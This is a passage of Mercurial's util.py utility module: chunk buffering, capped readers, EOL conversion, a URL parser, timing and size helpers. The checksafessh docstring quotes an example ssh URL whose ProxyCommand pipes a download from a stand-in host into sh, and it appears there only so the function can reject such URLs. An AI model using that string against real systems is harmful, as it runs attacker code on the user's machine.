2386 2386 queue.popleft()
2387 2387 buf.append(chunk)
2388 2388 # self._chunkoffset remains at 0.
2389 2389 continue
2390 2390
2391 2391 chunkremaining = chunkl - offset
2392 2392
2393 2393 # Use all of unconsumed part of chunk.
2394 2394 if left >= chunkremaining:
2395 2395 left -= chunkremaining
2396 2396 queue.popleft()
2397 2397 # The offset == 0 case is handled by the block above, so this
2398 2398 # won't merely copy via ``chunk[0:]``.
2399 2399 buf.append(chunk[offset:])
2400 2400 self._chunkoffset = 0
2401 2401
2402 2402 # Partial chunk needed.
2403 2403 else:
2404 2404 buf.append(chunk[offset:offset + left])
2405 2405 self._chunkoffset += left
2406 2406 left -= chunkremaining
2407 2407
2408 2408 return ''.join(buf)
2409 2409
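# Illustrative sketch (not part of the original module): chunkbuffer
# turns an iterator of arbitrarily sized chunks into exact-size reads.
#
#     cb = chunkbuffer(iter([b'abc', b'defgh', b'ij']))
#     cb.read(4)   # -> 'abcd' (spans the first two chunks)
#     cb.read(4)   # -> 'efgh'
#     cb.read(4)   # -> 'ij' (short read once the chunks run dry)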
2410 2410 def filechunkiter(f, size=131072, limit=None):
2411 2411 """Create a generator that produces the data in the file size
2412 2412 (default 131072) bytes at a time, up to optional limit (default is
2413 2413 to read all data). Chunks may be less than size bytes if the
2414 2414 chunk is the last chunk in the file, or the file is a socket or
2415 2415 some other type of file that sometimes reads less data than is
2416 2416 requested."""
2417 2417 assert size >= 0
2418 2418 assert limit is None or limit >= 0
2419 2419 while True:
2420 2420 if limit is None:
2421 2421 nbytes = size
2422 2422 else:
2423 2423 nbytes = min(limit, size)
2424 2424 s = nbytes and f.read(nbytes)
2425 2425 if not s:
2426 2426 break
2427 2427 if limit:
2428 2428 limit -= len(s)
2429 2429 yield s
2430 2430
2431 2431 class cappedreader(object):
2432 2432 """A file object proxy that allows reading up to N bytes.
2433 2433
2434 2434 Given a source file object, instances of this type allow reading up to
2435 2435 N bytes from that source file object. Attempts to read past the allowed
2436 2436 limit are treated as EOF.
2437 2437
2438 2438 It is assumed that I/O is not performed on the original file object
2439 2439 in addition to I/O that is performed by this instance. If there is,
2440 2440 state tracking will get out of sync and unexpected results will ensue.
2441 2441 """
2442 2442 def __init__(self, fh, limit):
2443 2443 """Allow reading up to <limit> bytes from <fh>."""
2444 2444 self._fh = fh
2445 2445 self._left = limit
2446 2446
2447 2447 def read(self, n=-1):
2448 2448 if not self._left:
2449 2449 return b''
2450 2450
2451 2451 if n < 0:
2452 2452 n = self._left
2453 2453
2454 2454 data = self._fh.read(min(n, self._left))
2455 2455 self._left -= len(data)
2456 2456 assert self._left >= 0
2457 2457
2458 2458 return data
2459 2459
2460 2460 def readinto(self, b):
2461 2461 res = self.read(len(b))
2462 2462 if res is None:
2463 2463 return None
2464 2464
2465 2465 b[0:len(res)] = res
2466 2466 return len(res)
2467 2467
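# Illustrative sketch (not part of the original module), assuming
# 'import io' for the in-memory file:
#
#     fh = io.BytesIO(b'0123456789')
#     capped = cappedreader(fh, 4)
#     capped.read()   # -> '0123'
#     capped.read()   # -> '' (limit reached, treated as EOF)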
2468 2468 def unitcountfn(*unittable):
2469 2469 '''return a function that renders a readable count of some quantity'''
2470 2470
2471 2471 def go(count):
2472 2472 for multiplier, divisor, format in unittable:
2473 2473 if abs(count) >= divisor * multiplier:
2474 2474 return format % (count / float(divisor))
2475 2475 return unittable[-1][2] % count
2476 2476
2477 2477 return go
2478 2478
2479 2479 def processlinerange(fromline, toline):
2480 2480 """Check that linerange <fromline>:<toline> makes sense and return a
2481 2481 0-based range.
2482 2482
2483 2483 >>> processlinerange(10, 20)
2484 2484 (9, 20)
2485 2485 >>> processlinerange(2, 1)
2486 2486 Traceback (most recent call last):
2487 2487 ...
2488 2488 ParseError: line range must be positive
2489 2489 >>> processlinerange(0, 5)
2490 2490 Traceback (most recent call last):
2491 2491 ...
2492 2492 ParseError: fromline must be strictly positive
2493 2493 """
2494 2494 if toline - fromline < 0:
2495 2495 raise error.ParseError(_("line range must be positive"))
2496 2496 if fromline < 1:
2497 2497 raise error.ParseError(_("fromline must be strictly positive"))
2498 2498 return fromline - 1, toline
2499 2499
2500 2500 bytecount = unitcountfn(
2501 2501 (100, 1 << 30, _('%.0f GB')),
2502 2502 (10, 1 << 30, _('%.1f GB')),
2503 2503 (1, 1 << 30, _('%.2f GB')),
2504 2504 (100, 1 << 20, _('%.0f MB')),
2505 2505 (10, 1 << 20, _('%.1f MB')),
2506 2506 (1, 1 << 20, _('%.2f MB')),
2507 2507 (100, 1 << 10, _('%.0f KB')),
2508 2508 (10, 1 << 10, _('%.1f KB')),
2509 2509 (1, 1 << 10, _('%.2f KB')),
2510 2510 (1, 1, _('%.0f bytes')),
2511 2511 )
2512 2512
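# Illustrative sketch (not part of the original module): bytecount picks
# the coarsest unit whose threshold the value clears, with precision
# shrinking as the magnitude grows.
#
#     bytecount(500)          # -> '500 bytes'
#     bytecount(2048)         # -> '2.00 KB'
#     bytecount(15 * 2**20)   # -> '15.0 MB'
#     bytecount(2 * 2**30)    # -> '2.00 GB'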
2513 2513 class transformingwriter(object):
2514 2514 """Writable file wrapper to transform data by function"""
2515 2515
2516 2516 def __init__(self, fp, encode):
2517 2517 self._fp = fp
2518 2518 self._encode = encode
2519 2519
2520 2520 def close(self):
2521 2521 self._fp.close()
2522 2522
2523 2523 def flush(self):
2524 2524 self._fp.flush()
2525 2525
2526 2526 def write(self, data):
2527 2527 return self._fp.write(self._encode(data))
2528 2528
2529 2529 # Matches a single EOL which can either be a CRLF where repeated CR
2530 2530 # are removed or a LF. We do not care about old Macintosh files, so a
2531 2531 # stray CR is an error.
2532 2532 _eolre = remod.compile(br'\r*\n')
2533 2533
2534 2534 def tolf(s):
2535 2535 return _eolre.sub('\n', s)
2536 2536
2537 2537 def tocrlf(s):
2538 2538 return _eolre.sub('\r\n', s)
2539 2539
2540 2540 def _crlfwriter(fp):
2541 2541 return transformingwriter(fp, tocrlf)
2542 2542
2543 2543 if pycompat.oslinesep == '\r\n':
2544 2544 tonativeeol = tocrlf
2545 2545 fromnativeeol = tolf
2546 2546 nativeeolwriter = _crlfwriter
2547 2547 else:
2548 2548 tonativeeol = pycompat.identity
2549 2549 fromnativeeol = pycompat.identity
2550 2550 nativeeolwriter = pycompat.identity
2551 2551
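# Illustrative sketch (not part of the original module):
#
#     tolf(b'a\r\nb\r\n')    # -> 'a\nb\n'
#     tocrlf(b'a\nb\n')      # -> 'a\r\nb\r\n'
#     # tonativeeol/fromnativeeol resolve to one of these (or to the
#     # identity) depending on pycompat.oslinesep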
2552 2552 if (pyplatform.python_implementation() == 'CPython' and
2553 2553 sys.version_info < (3, 0)):
2554 2554 # There is an issue in CPython that some IO methods do not handle EINTR
2555 2555 # correctly. The following table shows what CPython version (and functions)
2556 2556 # are affected (buggy: has the EINTR bug, okay: otherwise):
2557 2557 #
2558 2558 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2559 2559 # --------------------------------------------------
2560 2560 # fp.__iter__ | buggy | buggy | okay
2561 2561 # fp.read* | buggy | okay [1] | okay
2562 2562 #
2563 2563 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2564 2564 #
2565 2565 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2566 2566 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2567 2567 #
2568 2568 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2569 2569 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2570 2570 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2571 2571 # fp.__iter__ but not other fp.read* methods.
2572 2572 #
2573 2573 # On modern systems like Linux, the "read" syscall cannot be interrupted
2574 2574 # when reading "fast" files like on-disk files. So the EINTR issue only
2575 2575 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2576 2576 # files approximately as "fast" files and use the fast (unsafe) code path,
2577 2577 # to minimize the performance impact.
2578 2578 if sys.version_info >= (2, 7, 4):
2579 2579 # fp.readline deals with EINTR correctly, use it as a workaround.
2580 2580 def _safeiterfile(fp):
2581 2581 return iter(fp.readline, '')
2582 2582 else:
2583 2583 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2584 2584 # note: this may block longer than necessary because of bufsize.
2585 2585 def _safeiterfile(fp, bufsize=4096):
2586 2586 fd = fp.fileno()
2587 2587 line = ''
2588 2588 while True:
2589 2589 try:
2590 2590 buf = os.read(fd, bufsize)
2591 2591 except OSError as ex:
2592 2592 # os.read only raises EINTR before any data is read
2593 2593 if ex.errno == errno.EINTR:
2594 2594 continue
2595 2595 else:
2596 2596 raise
2597 2597 line += buf
2598 2598 if '\n' in buf:
2599 2599 splitted = line.splitlines(True)
2600 2600 line = ''
2601 2601 for l in splitted:
2602 2602 if l[-1] == '\n':
2603 2603 yield l
2604 2604 else:
2605 2605 line = l
2606 2606 if not buf:
2607 2607 break
2608 2608 if line:
2609 2609 yield line
2610 2610
2611 2611 def iterfile(fp):
2612 2612 fastpath = True
2613 2613 if type(fp) is file:
2614 2614 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2615 2615 if fastpath:
2616 2616 return fp
2617 2617 else:
2618 2618 return _safeiterfile(fp)
2619 2619 else:
2620 2620 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2621 2621 def iterfile(fp):
2622 2622 return fp
2623 2623
2624 2624 def iterlines(iterator):
2625 2625 for chunk in iterator:
2626 2626 for line in chunk.splitlines():
2627 2627 yield line
2628 2628
2629 2629 def expandpath(path):
2630 2630 return os.path.expanduser(os.path.expandvars(path))
2631 2631
2632 2632 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2633 2633 """Return the result of interpolating items in the mapping into string s.
2634 2634
2635 2635 prefix is a single character string, or a two character string with
2636 2636 a backslash as the first character if the prefix needs to be escaped in
2637 2637 a regular expression.
2638 2638
2639 2639 fn is an optional function that will be applied to the replacement text
2640 2640 just before replacement.
2641 2641
2642 2642 escape_prefix is an optional flag that allows using doubled prefix for
2643 2643 its escaping.
2644 2644 """
2645 2645 fn = fn or (lambda s: s)
2646 2646 patterns = '|'.join(mapping.keys())
2647 2647 if escape_prefix:
2648 2648 patterns += '|' + prefix
2649 2649 if len(prefix) > 1:
2650 2650 prefix_char = prefix[1:]
2651 2651 else:
2652 2652 prefix_char = prefix
2653 2653 mapping[prefix_char] = prefix_char
2654 2654 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2655 2655 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2656 2656
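# Illustrative sketch (not part of the original module):
#
#     interpolate('%', {'user': 'joe', 'repo': 'hg'},
#                 'pushed to %repo by %user')
#     # -> 'pushed to hg by joe'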
2657 2657 def getport(port):
2658 2658 """Return the port for a given network service.
2659 2659
2660 2660 If port is an integer, it's returned as is. If it's a string, it's
2661 2661 looked up using socket.getservbyname(). If there's no matching
2662 2662 service, error.Abort is raised.
2663 2663 """
2664 2664 try:
2665 2665 return int(port)
2666 2666 except ValueError:
2667 2667 pass
2668 2668
2669 2669 try:
2670 2670 return socket.getservbyname(pycompat.sysstr(port))
2671 2671 except socket.error:
2672 2672 raise error.Abort(_("no port number associated with service '%s'")
2673 2673 % port)
2674 2674
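# Illustrative sketch (not part of the original module):
#
#     getport('8080')      # -> 8080
#     getport('http')      # -> 80, via socket.getservbyname()
#     getport('no-such')   # raises error.Abort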
2675 2675 class url(object):
2676 2676 r"""Reliable URL parser.
2677 2677
2678 2678 This parses URLs and provides attributes for the following
2679 2679 components:
2680 2680
2681 2681 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2682 2682
2683 2683 Missing components are set to None. The only exception is
2684 2684 fragment, which is set to '' if present but empty.
2685 2685
2686 2686 If parsefragment is False, fragment is included in query. If
2687 2687 parsequery is False, query is included in path. If both are
2688 2688 False, both fragment and query are included in path.
2689 2689
2690 2690 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2691 2691
2692 2692 Note that for backward compatibility reasons, bundle URLs do not
2693 2693 take host names. That means 'bundle://../' has a path of '../'.
2694 2694
2695 2695 Examples:
2696 2696
2697 2697 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2698 2698 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2699 2699 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2700 2700 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2701 2701 >>> url(b'file:///home/joe/repo')
2702 2702 <url scheme: 'file', path: '/home/joe/repo'>
2703 2703 >>> url(b'file:///c:/temp/foo/')
2704 2704 <url scheme: 'file', path: 'c:/temp/foo/'>
2705 2705 >>> url(b'bundle:foo')
2706 2706 <url scheme: 'bundle', path: 'foo'>
2707 2707 >>> url(b'bundle://../foo')
2708 2708 <url scheme: 'bundle', path: '../foo'>
2709 2709 >>> url(br'c:\foo\bar')
2710 2710 <url path: 'c:\\foo\\bar'>
2711 2711 >>> url(br'\\blah\blah\blah')
2712 2712 <url path: '\\\\blah\\blah\\blah'>
2713 2713 >>> url(br'\\blah\blah\blah#baz')
2714 2714 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2715 2715 >>> url(br'file:///C:\users\me')
2716 2716 <url scheme: 'file', path: 'C:\\users\\me'>
2717 2717
2718 2718 Authentication credentials:
2719 2719
2720 2720 >>> url(b'ssh://joe:xyz@x/repo')
2721 2721 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2722 2722 >>> url(b'ssh://joe@x/repo')
2723 2723 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2724 2724
2725 2725 Query strings and fragments:
2726 2726
2727 2727 >>> url(b'http://host/a?b#c')
2728 2728 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2729 2729 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2730 2730 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2731 2731
2732 2732 Empty path:
2733 2733
2734 2734 >>> url(b'')
2735 2735 <url path: ''>
2736 2736 >>> url(b'#a')
2737 2737 <url path: '', fragment: 'a'>
2738 2738 >>> url(b'http://host/')
2739 2739 <url scheme: 'http', host: 'host', path: ''>
2740 2740 >>> url(b'http://host/#a')
2741 2741 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2742 2742
2743 2743 Only scheme:
2744 2744
2745 2745 >>> url(b'http:')
2746 2746 <url scheme: 'http'>
2747 2747 """
2748 2748
2749 2749 _safechars = "!~*'()+"
2750 2750 _safepchars = "/!~*'()+:\\"
2751 2751 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2752 2752
2753 2753 def __init__(self, path, parsequery=True, parsefragment=True):
2754 2754 # We slowly chomp away at path until we have only the path left
2755 2755 self.scheme = self.user = self.passwd = self.host = None
2756 2756 self.port = self.path = self.query = self.fragment = None
2757 2757 self._localpath = True
2758 2758 self._hostport = ''
2759 2759 self._origpath = path
2760 2760
2761 2761 if parsefragment and '#' in path:
2762 2762 path, self.fragment = path.split('#', 1)
2763 2763
2764 2764 # special case for Windows drive letters and UNC paths
2765 2765 if hasdriveletter(path) or path.startswith('\\\\'):
2766 2766 self.path = path
2767 2767 return
2768 2768
2769 2769 # For compatibility reasons, we can't handle bundle paths as
2770 2770 # normal URLs
2771 2771 if path.startswith('bundle:'):
2772 2772 self.scheme = 'bundle'
2773 2773 path = path[7:]
2774 2774 if path.startswith('//'):
2775 2775 path = path[2:]
2776 2776 self.path = path
2777 2777 return
2778 2778
2779 2779 if self._matchscheme(path):
2780 2780 parts = path.split(':', 1)
2781 2781 if parts[0]:
2782 2782 self.scheme, path = parts
2783 2783 self._localpath = False
2784 2784
2785 2785 if not path:
2786 2786 path = None
2787 2787 if self._localpath:
2788 2788 self.path = ''
2789 2789 return
2790 2790 else:
2791 2791 if self._localpath:
2792 2792 self.path = path
2793 2793 return
2794 2794
2795 2795 if parsequery and '?' in path:
2796 2796 path, self.query = path.split('?', 1)
2797 2797 if not path:
2798 2798 path = None
2799 2799 if not self.query:
2800 2800 self.query = None
2801 2801
2802 2802 # // is required to specify a host/authority
2803 2803 if path and path.startswith('//'):
2804 2804 parts = path[2:].split('/', 1)
2805 2805 if len(parts) > 1:
2806 2806 self.host, path = parts
2807 2807 else:
2808 2808 self.host = parts[0]
2809 2809 path = None
2810 2810 if not self.host:
2811 2811 self.host = None
2812 2812 # path of file:///d is /d
2813 2813 # path of file:///d:/ is d:/, not /d:/
2814 2814 if path and not hasdriveletter(path):
2815 2815 path = '/' + path
2816 2816
2817 2817 if self.host and '@' in self.host:
2818 2818 self.user, self.host = self.host.rsplit('@', 1)
2819 2819 if ':' in self.user:
2820 2820 self.user, self.passwd = self.user.split(':', 1)
2821 2821 if not self.host:
2822 2822 self.host = None
2823 2823
2824 2824 # Don't split on colons in IPv6 addresses without ports
2825 2825 if (self.host and ':' in self.host and
2826 2826 not (self.host.startswith('[') and self.host.endswith(']'))):
2827 2827 self._hostport = self.host
2828 2828 self.host, self.port = self.host.rsplit(':', 1)
2829 2829 if not self.host:
2830 2830 self.host = None
2831 2831
2832 2832 if (self.host and self.scheme == 'file' and
2833 2833 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2834 2834 raise error.Abort(_('file:// URLs can only refer to localhost'))
2835 2835
2836 2836 self.path = path
2837 2837
2838 2838 # leave the query string escaped
2839 2839 for a in ('user', 'passwd', 'host', 'port',
2840 2840 'path', 'fragment'):
2841 2841 v = getattr(self, a)
2842 2842 if v is not None:
2843 2843 setattr(self, a, urlreq.unquote(v))
2844 2844
2845 2845 @encoding.strmethod
2846 2846 def __repr__(self):
2847 2847 attrs = []
2848 2848 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2849 2849 'query', 'fragment'):
2850 2850 v = getattr(self, a)
2851 2851 if v is not None:
2852 2852 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2853 2853 return '<url %s>' % ', '.join(attrs)
2854 2854
2855 2855 def __bytes__(self):
2856 2856 r"""Join the URL's components back into a URL string.
2857 2857
2858 2858 Examples:
2859 2859
2860 2860 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2861 2861 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2862 2862 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2863 2863 'http://user:pw@host:80/?foo=bar&baz=42'
2864 2864 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2865 2865 'http://user:pw@host:80/?foo=bar%3dbaz'
2866 2866 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2867 2867 'ssh://user:pw@[::1]:2200//home/joe#'
2868 2868 >>> bytes(url(b'http://localhost:80//'))
2869 2869 'http://localhost:80//'
2870 2870 >>> bytes(url(b'http://localhost:80/'))
2871 2871 'http://localhost:80/'
2872 2872 >>> bytes(url(b'http://localhost:80'))
2873 2873 'http://localhost:80/'
2874 2874 >>> bytes(url(b'bundle:foo'))
2875 2875 'bundle:foo'
2876 2876 >>> bytes(url(b'bundle://../foo'))
2877 2877 'bundle:../foo'
2878 2878 >>> bytes(url(b'path'))
2879 2879 'path'
2880 2880 >>> bytes(url(b'file:///tmp/foo/bar'))
2881 2881 'file:///tmp/foo/bar'
2882 2882 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2883 2883 'file:///c:/tmp/foo/bar'
2884 2884 >>> print(url(br'bundle:foo\bar'))
2885 2885 bundle:foo\bar
2886 2886 >>> print(url(br'file:///D:\data\hg'))
2887 2887 file:///D:\data\hg
2888 2888 """
2889 2889 if self._localpath:
2890 2890 s = self.path
2891 2891 if self.scheme == 'bundle':
2892 2892 s = 'bundle:' + s
2893 2893 if self.fragment:
2894 2894 s += '#' + self.fragment
2895 2895 return s
2896 2896
2897 2897 s = self.scheme + ':'
2898 2898 if self.user or self.passwd or self.host:
2899 2899 s += '//'
2900 2900 elif self.scheme and (not self.path or self.path.startswith('/')
2901 2901 or hasdriveletter(self.path)):
2902 2902 s += '//'
2903 2903 if hasdriveletter(self.path):
2904 2904 s += '/'
2905 2905 if self.user:
2906 2906 s += urlreq.quote(self.user, safe=self._safechars)
2907 2907 if self.passwd:
2908 2908 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2909 2909 if self.user or self.passwd:
2910 2910 s += '@'
2911 2911 if self.host:
2912 2912 if not (self.host.startswith('[') and self.host.endswith(']')):
2913 2913 s += urlreq.quote(self.host)
2914 2914 else:
2915 2915 s += self.host
2916 2916 if self.port:
2917 2917 s += ':' + urlreq.quote(self.port)
2918 2918 if self.host:
2919 2919 s += '/'
2920 2920 if self.path:
2921 2921 # TODO: similar to the query string, we should not unescape the
2922 2922 # path when we store it, the path might contain '%2f' = '/',
2923 2923 # which we should *not* escape.
2924 2924 s += urlreq.quote(self.path, safe=self._safepchars)
2925 2925 if self.query:
2926 2926 # we store the query in escaped form.
2927 2927 s += '?' + self.query
2928 2928 if self.fragment is not None:
2929 2929 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2930 2930 return s
2931 2931
2932 2932 __str__ = encoding.strmethod(__bytes__)
2933 2933
2934 2934 def authinfo(self):
2935 2935 user, passwd = self.user, self.passwd
2936 2936 try:
2937 2937 self.user, self.passwd = None, None
2938 2938 s = bytes(self)
2939 2939 finally:
2940 2940 self.user, self.passwd = user, passwd
2941 2941 if not self.user:
2942 2942 return (s, None)
2943 2943 # authinfo[1] is passed to urllib2 password manager, and its
2944 2944 # URIs must not contain credentials. The host is passed in the
2945 2945 # URIs list because Python < 2.4.3 uses only that to search for
2946 2946 # a password.
2947 2947 return (s, (None, (s, self.host),
2948 2948 self.user, self.passwd or ''))
2949 2949
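# Illustrative sketch of authinfo() (not part of the original module;
# the URL and credentials below are made-up values):
#
#   >>> u = url(b'http://user:pw@host/path')
#   >>> u.authinfo()
#   ('http://host/path', (None, ('http://host/path', 'host'), 'user', 'pw'))
#
# The credential-free string goes into the request URL, while the tuple
# feeds a urllib2-style password manager.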
2950 2950 def isabs(self):
2951 2951 if self.scheme and self.scheme != 'file':
2952 2952 return True # remote URL
2953 2953 if hasdriveletter(self.path):
2954 2954 return True # absolute for our purposes - can't be joined()
2955 2955 if self.path.startswith(br'\\'):
2956 2956 return True # Windows UNC path
2957 2957 if self.path.startswith('/'):
2958 2958 return True # POSIX-style
2959 2959 return False
2960 2960
2961 2961 def localpath(self):
2962 2962 if self.scheme == 'file' or self.scheme == 'bundle':
2963 2963 path = self.path or '/'
2964 2964 # For Windows, we need to promote hosts containing drive
2965 2965 # letters to paths with drive letters.
2966 2966 if hasdriveletter(self._hostport):
2967 2967 path = self._hostport + '/' + self.path
2968 2968 elif (self.host is not None and self.path
2969 2969 and not hasdriveletter(path)):
2970 2970 path = '/' + path
2971 2971 return path
2972 2972 return self._origpath
2973 2973
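# Sketch of the drive-letter promotion above (values assumed, mirroring
# the "path of file:///d:/ is d:/" comment in the parser):
#
#   >>> url(b'file:///c:/tmp').localpath()
#   'c:/tmp'
#   >>> url(b'file:///tmp').localpath()
#   '/tmp'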
2974 2974 def islocal(self):
2975 2975 '''whether localpath will return something that posixfile can open'''
2976 2976 return (not self.scheme or self.scheme == 'file'
2977 2977 or self.scheme == 'bundle')
2978 2978
2979 2979 def hasscheme(path):
2980 2980 return bool(url(path).scheme)
2981 2981
2982 2982 def hasdriveletter(path):
2983 2983 return path and path[1:2] == ':' and path[0:1].isalpha()
2984 2984
2985 2985 def urllocalpath(path):
2986 2986 return url(path, parsequery=False, parsefragment=False).localpath()
2987 2987
2988 2988 def checksafessh(path):
2989 2989 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2990 2990
2991 2991 This is a sanity check for ssh urls. ssh will parse the first item as
2992 2992 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2993 2993 Let's prevent these potentially exploitable urls entirely and warn the
2994 2994 user.
2995 2995
2996 2996 Raises an error.Abort when the url is unsafe.
2997 2997 """
2998 2998 path = urlreq.unquote(path)
2999 2999 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3000 3000 raise error.Abort(_('potentially unsafe url: %r') %
3001 3001 (pycompat.bytestr(path),))
3002 3002
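# A minimal standalone sketch of the same check (Python 3 assumed; the
# helper name is illustrative, not part of this module):
#
#   from urllib.parse import unquote
#
#   def _looks_unsafe(path):
#       path = unquote(path)
#       return path.startswith('ssh://-') or path.startswith('svn+ssh://-')
#
#   _looks_unsafe('ssh://-oProxyCommand=evil/path')  # True: would abort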
3003 3003 def hidepassword(u):
3004 3004 '''hide user credential in a url string'''
3005 3005 u = url(u)
3006 3006 if u.passwd:
3007 3007 u.passwd = '***'
3008 3008 return bytes(u)
3009 3009
3010 3010 def removeauth(u):
3011 3011 '''remove all authentication information from a url string'''
3012 3012 u = url(u)
3013 3013 u.user = u.passwd = None
3014 3014 return bytes(u)
3015 3015
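# Doctest-style sketch of the two helpers above (the credentials are
# invented):
#
#   >>> hidepassword(b'http://user:secret@host/repo')
#   'http://user:***@host/repo'
#   >>> removeauth(b'http://user:secret@host/repo')
#   'http://host/repo'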
3016 3016 timecount = unitcountfn(
3017 3017 (1, 1e3, _('%.0f s')),
3018 3018 (100, 1, _('%.1f s')),
3019 3019 (10, 1, _('%.2f s')),
3020 3020 (1, 1, _('%.3f s')),
3021 3021 (100, 0.001, _('%.1f ms')),
3022 3022 (10, 0.001, _('%.2f ms')),
3023 3023 (1, 0.001, _('%.3f ms')),
3024 3024 (100, 0.000001, _('%.1f us')),
3025 3025 (10, 0.000001, _('%.2f us')),
3026 3026 (1, 0.000001, _('%.3f us')),
3027 3027 (100, 0.000000001, _('%.1f ns')),
3028 3028 (10, 0.000000001, _('%.2f ns')),
3029 3029 (1, 0.000000001, _('%.3f ns')),
3030 3030 )
3031 3031
3032 3032 @attr.s
3033 3033 class timedcmstats(object):
3034 3034 """Stats information produced by the timedcm context manager on entering."""
3035 3035
3036 3036 # the starting value of the timer as a float (meaning and resolution are
3037 3037 # platform dependent, see util.timer)
3038 3038 start = attr.ib(default=attr.Factory(lambda: timer()))
3039 3039 # the number of seconds as a floating point value; starts at 0, updated when
3040 3040 # the context is exited.
3041 3041 elapsed = attr.ib(default=0)
3042 3042 # the number of nested timedcm context managers.
3043 3043 level = attr.ib(default=1)
3044 3044
3045 3045 def __bytes__(self):
3046 3046 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3047 3047
3048 3048 __str__ = encoding.strmethod(__bytes__)
3049 3049
3050 3050 @contextlib.contextmanager
3051 3051 def timedcm(whencefmt, *whenceargs):
3052 3052 """A context manager that produces timing information for a given context.
3053 3053
3054 3054 On entering, a timedcmstats instance is produced.
3055 3055
3056 3056 This context manager is reentrant.
3057 3057
3058 3058 """
3059 3059 # track nested context managers
3060 3060 timedcm._nested += 1
3061 3061 timing_stats = timedcmstats(level=timedcm._nested)
3062 3062 try:
3063 3063 with tracing.log(whencefmt, *whenceargs):
3064 3064 yield timing_stats
3065 3065 finally:
3066 3066 timing_stats.elapsed = timer() - timing_stats.start
3067 3067 timedcm._nested -= 1
3068 3068
3069 3069 timedcm._nested = 0
3070 3070
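# Illustrative use of timedcm (the format string and the timed operation
# are assumptions):
#
#   with timedcm(b'loading %s', b'manifest') as stats:
#       load_manifest()
#   # stats.elapsed now holds the duration in seconds; bytes(stats)
#   # renders it through timecount(), e.g. '1.23 ms'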
3071 3071 def timed(func):
3072 3072 '''Report the execution time of a function call to stderr.
3073 3073
3074 3074 During development, use as a decorator when you need to measure
3075 3075 the cost of a function, e.g. as follows:
3076 3076
3077 3077 @util.timed
3078 3078 def foo(a, b, c):
3079 3079 pass
3080 3080 '''
3081 3081
3082 3082 def wrapper(*args, **kwargs):
3083 3083 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3084 3084 result = func(*args, **kwargs)
3085 3085 stderr = procutil.stderr
3086 3086 stderr.write('%s%s: %s\n' % (
3087 3087 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3088 3088 time_stats))
3089 3089 return result
3090 3090 return wrapper
3091 3091
3092 3092 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3093 3093 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3094 3094
3095 3095 def sizetoint(s):
3096 3096 '''Convert a size specifier to a byte count.
3097 3097
3098 3098 >>> sizetoint(b'30')
3099 3099 30
3100 3100 >>> sizetoint(b'2.2kb')
3101 3101 2252
3102 3102 >>> sizetoint(b'6M')
3103 3103 6291456
3104 3104 '''
3105 3105 t = s.strip().lower()
3106 3106 try:
3107 3107 for k, u in _sizeunits:
3108 3108 if t.endswith(k):
3109 3109 return int(float(t[:-len(k)]) * u)
3110 3110 return int(t)
3111 3111 except ValueError:
3112 3112 raise error.ParseError(_("couldn't parse size: %s") % s)
3113 3113
3114 3114 class hooks(object):
3115 3115 '''A collection of hook functions that can be used to extend a
3116 3116 function's behavior. Hooks are called in lexicographic order,
3117 3117 based on the names of their sources.'''
3118 3118
3119 3119 def __init__(self):
3120 3120 self._hooks = []
3121 3121
3122 3122 def add(self, source, hook):
3123 3123 self._hooks.append((source, hook))
3124 3124
3125 3125 def __call__(self, *args):
3126 3126 self._hooks.sort(key=lambda x: x[0])
3127 3127 results = []
3128 3128 for source, hook in self._hooks:
3129 3129 results.append(hook(*args))
3130 3130 return results
3131 3131
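# Sketch of the hooks multiplexer (source names and hook bodies are
# invented for illustration):
#
#   >>> h = hooks()
#   >>> h.add('b-ext', lambda x: x + 1)
#   >>> h.add('a-ext', lambda x: x * 2)
#   >>> h(3)   # hooks run in lexicographic source order: 'a-ext' first
#   [6, 4]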
